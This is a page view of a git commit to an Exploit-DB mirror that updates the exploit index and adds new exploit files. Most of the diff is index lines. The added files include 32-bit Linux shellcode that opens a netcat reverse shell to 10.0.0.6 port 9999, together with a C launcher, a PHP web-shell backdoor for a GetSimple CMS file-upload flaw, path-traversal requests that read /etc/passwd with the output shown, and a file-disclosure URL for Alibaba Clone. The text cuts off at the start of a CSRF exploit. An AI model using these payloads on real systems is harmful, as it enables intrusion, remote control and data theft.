bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-06-24

Browse source 
16 new exploits

Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability

PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability
ARM Bindshell port 0x1337
ARM Bind Connect UDP Port 68
ARM Loader Port 0x1337
ARM ifconfig eth0 and Assign Address
ARM Bindshell port 0x1337
ARM Bind Connect UDP Port 68
ARM Loader Port 0x1337
ARM ifconfig eth0 and Assign Address

G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability

ImpressPages CMS 3.8 - Stored XSS Vulnerability

Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery

Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability

Linux Netcat Reverse Shell - 32bit - 77 bytes

PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS
PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter XSS
Getsimple CMS 3.3.10 - Arbitrary File Upload

op5 v7.1.9 Configuration Command Execution
op5 7.1.9 - Configuration Command Execution
Alibaba Clone B2B Script - Arbitrary File Disclosure
XuezhuLi FileSharing - Directory Traversal
XuezhuLi FileSharing - (Add User) CSRF
FinderView - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2016-06-24 05:06:19 +00:00
parent 412cc0a204
commit 3739831fb2
18 changed files with 312 additions and 98 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

30
files.csv
View file

@ -8857,7 +8857,7 @@ id,file,description,date,author,platform,type,port
9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple Remote SQL Injection Vulnerabilities",2009-08-07,SwEET-DeViL,php,webapps,0
9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery <= 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-08-07,Red-D3v1L,php,webapps,0
9386,platforms/windows/local/9386.txt,"Steam 54/894 - Local Privilege Escalation Vulnerability",2009-08-07,MrDoug,windows,local,0
9387,platforms/php/webapps/9387.tx,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability",2009-08-07,"599eme Man",php,webapps,0
9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability",2009-08-07,"599eme Man",php,webapps,0
9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 (forumid) Remote SQL Injection Vulnerability",2009-08-07,Ruzgarin_Oglu,php,webapps,0
9390,platforms/php/webapps/9390.txt,"Typing Pal <= 1.0 (idTableProduit) SQL Injection Vulnerability",2009-08-07,Red-D3v1L,php,webapps,0
9392,platforms/windows/dos/9392.pl,"iRehearse - (.m3u) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0
@ -12850,7 +12850,7 @@ id,file,description,date,author,platform,type,port
14673,platforms/windows/local/14673.py,"Triologic Media Player 8 - (.m3u) Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous ",windows,local,0
14674,platforms/windows/remote/14674.txt,"Microsoft Windows - SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0
14687,platforms/windows/dos/14687.txt,"SonicWALL E-Class SSL-VPN ActiveX Control Format String Overflow",2010-08-19,"Nikolas Sotiriu",windows,dos,0
14678,platforms/php/dos/14678.zip,"PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability",2010-08-18,"Canberk BOLAT",php,dos,0
14678,platforms/php/dos/14678.txt,"PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability",2010-08-18,"Canberk BOLAT",php,dos,0
14679,platforms/windows/dos/14679.pl,"VbsEdit 4.6.1.0 - Denial of Service Vulnerability",2010-08-18,"C.G. Tan",windows,dos,0
14681,platforms/windows/local/14681.py,"A-PDF WAV to MP3 1.0.0 - Universal Local SEH Exploit",2010-08-18,Dr_IDE,windows,local,0
14683,platforms/windows/dos/14683.py,"Httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) PoC",2010-08-18,Dr_IDE,windows,dos,0
@ -13320,10 +13320,10 @@ id,file,description,date,author,platform,type,port
15310,platforms/php/webapps/15310.py,"Jamb CSRF Arbitrary Add a Post",2010-10-25,Stoke,php,webapps,0
15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Stack Overflow",2010-10-25,"Mighty-D and 7eK",windows,local,0
15313,platforms/php/webapps/15313.txt,"Plesk Small Business Manager 10.2.0 and Site Editor - Multiple Vulnerabilities",2010-10-25,"David Hoyt",php,webapps,0
15314,platforms/arm/shellcode/15314.S,"ARM Bindshell port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15315,platforms/arm/shellcode/15315.S,"ARM Bind Connect UDP Port 68",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15316,platforms/arm/shellcode/15316.S,"ARM Loader Port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15317,platforms/arm/shellcode/15317.S,"ARM ifconfig eth0 and Assign Address",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15314,platforms/arm/shellcode/15314.asm,"ARM Bindshell port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15315,platforms/arm/shellcode/15315.asm,"ARM Bind Connect UDP Port 68",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15316,platforms/arm/shellcode/15316.asm,"ARM Loader Port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15317,platforms/arm/shellcode/15317.asm,"ARM ifconfig eth0 and Assign Address",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0
15319,platforms/windows/dos/15319.pl,"Apache 2.2 (Windows) Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0
15320,platforms/php/webapps/15320.py,"Bigace_2.7.3 - CSRF Change Admin Password PoC",2010-10-26,Sweet,php,webapps,0
@ -13430,7 +13430,7 @@ id,file,description,date,author,platform,type,port
15439,platforms/php/webapps/15439.txt,"Joomla Component (com_connect) Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0
15440,platforms/php/webapps/15440.txt,"Joomla DCNews Component com_dcnews - Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0
15441,platforms/php/webapps/15441.txt,"MassMirror Uploader Remote File Inclusion Vulnerability",2010-11-06,ViciOuS,php,webapps,0
15444,platforms/windows/dos/15444.zip,"G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability",2010-11-06,"Nikita Tarakanov",windows,dos,0
15444,platforms/windows/dos/15444.txt,"G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability",2010-11-06,"Nikita Tarakanov",windows,dos,0
15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0
15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0
15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
@ -26697,7 +26697,7 @@ id,file,description,date,author,platform,type,port
29652,platforms/php/webapps/29652.txt,"Active Calendar 1.2 data/y_3.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0
29653,platforms/php/webapps/29653.txt,"Active Calendar 1.2 data/mysqlevents.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0
29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - (.reg) Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0
29790,platforms/php/webapps/29790.JPG,"ImpressPages CMS 3.8 - Stored XSS Vulnerability",2013-11-23,sajith,php,webapps,0
29790,platforms/php/webapps/29790.txt,"ImpressPages CMS 3.8 - Stored XSS Vulnerability",2013-11-23,sajith,php,webapps,0
29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - Crash PoC (.wav)",2013-11-23,"Akin Tosunlar",windows,dos,0
29658,platforms/php/webapps/29658.txt,"PhotoStand 1.2 Index.php Cross-Site Scripting Vulnerability",2007-02-24,"Simon Bonnard",php,webapps,0
29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 Explorer WMF File Handling Denial of Service Vulnerability",2007-02-25,sehato,windows,dos,0
@ -27668,7 +27668,7 @@ id,file,description,date,author,platform,type,port
30723,platforms/hardware/webapps/30723.php,"Seagate BlackArmor - Root Exploit",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
30724,platforms/linux/dos/30724.txt,"Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability",2007-10-31,"Bernhard Mueller",linux,dos,0
30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
30726,platforms/hardware/webapps/30726.2013-6922,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
30726,platforms/hardware/webapps/30726.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
30727,platforms/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
30728,platforms/linux/remote/30728.txt,"Yarssr 0.2.2 GUI.PM Remote Code Injection Vulnerability",2007-10-31,"Duncan Gilmore",linux,remote,0
30729,platforms/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",multiple,remote,0
@ -29741,7 +29741,7 @@ id,file,description,date,author,platform,type,port
32979,platforms/multiple/remote/32979.txt,"Glassfish Enterprise Server 2.1 Admin Console /webService/webServicesGeneral.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32980,platforms/multiple/remote/32980.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/auditModuleEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0
32981,platforms/multiple/remote/32981.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0
34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0
34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0
32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 (sorter.php sorter_value param) - SQL Injection",2014-04-22,chapp,php,webapps,80
32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
@ -30635,6 +30635,7 @@ id,file,description,date,author,platform,type,port
34005,platforms/php/webapps/34005.txt,"Percha Downloads Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34006,platforms/php/webapps/34006.txt,"Percha Gallery Component 1.6 Beta for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
40007,platforms/lin_x86/shellcode/40007.c,"Linux Netcat Reverse Shell - 32bit - 77 bytes",2016-06-23,CripSlick,lin_x86,shellcode,0
34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,metasploit,windows,remote,20010
34010,platforms/win32/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win32,dos,0
@ -32760,7 +32761,8 @@ id,file,description,date,author,platform,type,port
36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
40008,platforms/php/webapps/40008.txt,"Getsimple CMS 3.3.10 - Arbitrary File Upload",2016-06-23,s0nk3y,php,webapps,80
36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/googlemap.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 /modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition Parameter XSS",2011-11-23,Prestashop,php,webapps,0
36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 /admin/ajaxfilemanager/ajax_save_text.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
@ -36155,7 +36157,7 @@ id,file,description,date,author,platform,type,port
39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Stored XSS",2016-06-17,"David Silveiro",php,webapps,80
39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Shell Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
39973,platforms/linux/remote/39973.rb,"op5 v7.1.9 Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
39975,platforms/lin_x86-64/shellcode/39975.c,"Linux x86_64 execve Shellcode - 15 bytes",2016-06-20,CripSlick,lin_x86-64,shellcode,0
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
@ -36184,3 +36186,7 @@ id,file,description,date,author,platform,type,port
39999,platforms/win64/remote/39999.rb,"PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win64,remote,21
40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit (Metasploit)",2016-06-22,s0nk3y,php,remote,80
40005,platforms/win32/shellcode/40005.c,"Windows x86 ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode",2016-06-22,"Roziul Hasan Khan Shifat",win32,shellcode,0
40006,platforms/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",php,webapps,80
40009,platforms/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,php,webapps,80
40010,platforms/php/webapps/40010.html,"XuezhuLi FileSharing - (Add User) CSRF",2016-06-23,HaHwul,php,webapps,80
40011,platforms/php/webapps/40011.txt,"FinderView - Multiple Vulnerabilities",2016-06-23,HaHwul,php,webapps,80

Can't render this file because it is too large.

0
platforms/arm/shellcode/15314.S → platforms/arm/shellcode/15314.asm
View file

0
platforms/arm/shellcode/15315.S → platforms/arm/shellcode/15315.asm
View file

0
platforms/arm/shellcode/15316.S → platforms/arm/shellcode/15316.asm
View file

0
platforms/arm/shellcode/15317.S → platforms/arm/shellcode/15317.asm
View file

0
platforms/hardware/webapps/30726.2013-6922 → platforms/hardware/webapps/30726.txt
View file

119
platforms/lin_x86/shellcode/40007.c Executable file
View file

@ -0,0 +1,119 @@
#include <stdio.h>
#include <string.h>
//eben_s_dowling@georgiasouthern.edu
//OffSec ID: OS-20614
/*
global _start
_start:
;/bin//nc -e///bin/sh 10.0.0.6 99
xor eax,eax ; clear eax
xor edx,edx ; clear edi
; 0xIN-LAST IN-FIRST
push 0x39393939
mov esi, esp ; port in 4 hex bytes
push eax ; push null ------------
jmp short ipADDR
continue:
pop edi ; ipADDR
push eax ; push null ------------
push 0x68732F6E
push 0x69622F2F ; //bin/sh
push 0x2F2F652D ; -e//
mov ecx, esp
push eax ; push null ------------
push 0x636e2f2f ;
push 0x6e69622f ; push /bin
mov ebx, esp ; mov /bin//nc
push eax ; push null -----------
;--------------FIRST PUSH FINISHED------------------------
push esi ; push port
push edi ; push ipADDR
push ecx ; push -e////bin/sh
push ebx ; push /bin//nc
;--------------SECOND PUSH FINISHED------------------------
xor ecx, ecx
xor edx, edx
;--------------REGISTERS CLEARED FOR EXECVE----------------
mov ecx,esp ; mov /bin//nc > ecx ecx = long pointer
mov al,0x0b ; execve syscall
int 0x80 ; syscall
ipADDR:
call continue
db "10.0.0.6"
*/
#define PORT "\x39\x39\x39\x39" //port = 9999
/*To keep this shellcode at 52 bytes,
limit the port to 4 bytes*/
#define ipADDR "\x31\x30\x2e\x30\x2e\x30\x2e\x36" //IP = 10.0.0.6
//Both the IP & PORT are converted from ascii to hex
unsigned char shellcode[] =
// <_start>
"\x31\xc0" // xor %eax,%eax
"\x31\xd2" // xor %edx,%edx
"\x68"PORT // push $0x39393939
"\x89\xe6" // mov %esp,%esi
"\x50" // push %eax
"\xeb\x2f" // jmp 804809d <ipADDR>
// <continue>
"\x5f" // pop %edi
"\x50" // push %eax
"\x68\x6e\x2f\x73\x68" // push $0x68732f6e
"\x68\x2f\x2f\x62\x69" // push $0x69622f2f
"\x68\x2d\x65\x2f\x2f" // push $0x2f2f652d
"\x89\xe1" // mov %esp,%ecx
"\x50" // push %eax
"\x68\x2f\x2f\x6e\x63" // push $0x636e2f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x50" // push %eax
"\x56" // push %esi
"\x57" // push %edi
"\x51" // push %ecx
"\x53" // push %ebx
"\x31\xc9" // xor %ecx,%ecx
"\x31\xd2" // xor %edx,%edx
"\x89\xe1" // mov %esp,%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
// <ipADDR>
"\xe8\xcc\xff\xff\xff" // call 804806e <continue>
ipADDR
;
int main(void)
{
printf("Shellcode length: %d\n", strlen(shellcode));
(*(void(*)(void))shellcode)();
return 0;
}

0
platforms/multiple/webapps/34148.TXT → platforms/multiple/webapps/34148.txt
View file

0
platforms/php/dos/14678.zip → platforms/php/dos/14678.txt
View file

0
platforms/php/webapps/29790.JPG → platforms/php/webapps/29790.txt
View file

96
platforms/php/webapps/34007.txt
View file

@ -115,11 +115,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon
Vulnerability Name: SQL injection
Severity: Critical
@ -154,11 +149,6 @@ Tools used: Mozilla Firefox browser
Vulnerability Name: Link Injection (facilitates Cross-Site Request Forgery)
Severity: Critical
Affected Users: All authenticated users
@ -208,11 +198,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon
Vulnerability Name: Cross-site scripting (reflected)
Severity: Critical
URL: http://localhost/dolibarr/index.php
@ -256,11 +241,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon
Vulnerability Name: Cross-site scripting (reflected)
Severity: Critical
URL: http://localhost/dolibarr/index.php
@ -306,33 +286,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon
Vulnerability Name: Cross-site scripting (reflected)
Severity: Critical
@ -380,33 +333,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon
Vulnerability Name: Cross-site scripting (reflected)
Severity: Critical
@ -452,6 +378,8 @@ In cases where the application's functionality allows users to author content us
Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Tools used: Mozilla Firefox browser and Tamper Data Addon
Vulnerability Name: Cross-site scripting (reflected)
Severity: Critical
@ -497,6 +425,8 @@ In cases where the application's functionality allows users to author content us
Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Tools used: Mozilla Firefox browser and Tamper Data Addon
Vulnerability Name: Cross-site scripting (reflected)
Severity: Critical
@ -522,9 +452,6 @@ Connection: keep-alive
Affected parameter(s): mainmenu
Steps to replicate:
26. Open Dolibarr application in browser.
27. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon.
@ -543,6 +470,8 @@ In cases where the application's functionality allows users to author content us
Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Tools used: Mozilla Firefox browser and Tamper Data Addon
Vulnerability Name: Cross-site scripting (Stored)
Severity: Critical
@ -1166,9 +1095,6 @@ Connection: keep-alive
Affected parameter(s): leftmenu
Steps to replicate:
31. Open Dolibarr application in browser.
32. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon.
@ -1187,6 +1113,8 @@ In cases where the application's functionality allows users to author content us
Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Tools used: Mozilla Firefox browser and Tamper Data Addon
Vulnerability Name: Cross-site scripting (reflected)
Severity: Critical
@ -1227,6 +1155,8 @@ In cases where the application's functionality allows users to author content us
Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Tools used: Mozilla Firefox browser and Tamper Data Addon
Vulnerability Name: Cross-site scripting (reflected)
Severity: Critical
@ -1281,9 +1211,3 @@ dol_no_mouse_hover http://localhost/dolibarr/user/logout.php
dol_hide_topmenu http://localhost/dolibarr/user/logout.php
dol_hide_leftmenu http://localhost/dolibarr/user/logout.php

13
platforms/php/webapps/40006.txt Executable file
View file

@ -0,0 +1,13 @@
# Exploit Title: Alibaba Clone B2B Script File Read Vulnerability
# Date: 2016-06-22
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://alibaba-clone.com/
# Version: All Versions
# Tested on: CentOS and Windows
Exploit :
http://site/show_page.php?page=../[FilePath]%00
Example :
http://site/show_page.php?page=../configure.php%00

45
platforms/php/webapps/40008.txt Executable file
View file

@ -0,0 +1,45 @@
# Exploit Title: Getsimple CMS <= 3.3.10 Arbitrary File Upload Vulnerability
# Google Dork: -
# Date: 23/06/2016
# Exploit Author: s0nk3y
# Vendor Homepage: http://get-simple.info/
# Category: webapps
# Software Link: http://get-simple.info/data/uploads/releases/GetSimpleCMS-3.3.10.zip
# Version: 3.3.10
# Tested on: Ubuntu 16.04 / Mozilla Firefox
# Twitter: http://twitter.com/s0nk3y
# Linkedin: Rahmat Nurfauzi - http://linkedin.com/in/rahmatnurfauzi
Description
========================
GetSimple CMS has been downloaded over 120,000 times (as of March 2013).
The magazine t3n assigns GetSimple as "micro" and "Minimal-CMS" one, praises
the simplicity yet possible extensibility through plug-ins.
Vulnerability
========================
GetSimpleCMS Version 3.3.10 suffers from arbitrary file upload vulnerability
which allows an attacker to upload a backdoor.
This vulnerability is that the application uses a blacklist and whitelist
technique to compare the file against mime types and extensions.
Proof of Concept
========================
For exploiting this vulnerability we will create a file by adding the percent
behind extension.
1. evil.php% <--- this is simple trick :)
<?php
// simple backdoor
system($_GET['cmd']);
?>
2. An attacker login to the admin page and uploading the backdoor
3. The uploaded file will be under the "/data/uploads/" folder
Report Timeline
========================
2016-06-23 : Vulnerability reported to vendor
2016-06-23 : Disclosure

57
platforms/php/webapps/40009.txt Executable file
View file

@ -0,0 +1,57 @@
# Exploit Title: XuezhuLi FileSharing - Path Traversal Vulnerability
# Date: 2016-06-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/XuezhuLi
# Software Link: https://github.com/XuezhuLi/FileSharing/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
### Vulnerability
1. download.php -> file_name parameter
2. viewing.php -> file_name parameter
### Vulnerability 1 - download.php
GET /vul_test/FileSharing/download.php?file_name=../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/vul_test/FileSharing/userpage.php
Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; __utma=96992031.1679083892.1466384142.1466384142.1466398535.2; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=1%7C25; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1466565345; bdshare_firstime=1466565462740; PHPSESSID=uetimns4scbtk46c8m6ab7upp1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 23 Jun 2016 06:17:58 GMT
..snip..
Content-Type: application/octet-stream
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
# ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ----
### Vulnerability 2 - viewing.php
GET /vul_test/FileSharing/viewing.php?file_name=../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/vul_test/FileSharing/userpage.php
Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; __utma=96992031.1679083892.1466384142.1466384142.1466398535.2; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=1%7C25; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1466565345; bdshare_firstime=1466565462740; PHPSESSID=uetimns4scbtk46c8m6ab7upp1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 23 Jun 2016 06:19:49 GMT
Server: Apache/2.4.10 (Ubuntu)
..snip..
Content-Type: text/plain;charset=UTF-8
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

27
platforms/php/webapps/40010.html Executable file
View file

@ -0,0 +1,27 @@
<!--
# Exploit Title: XuezhuLi FileSharing - CSRF(Add User)
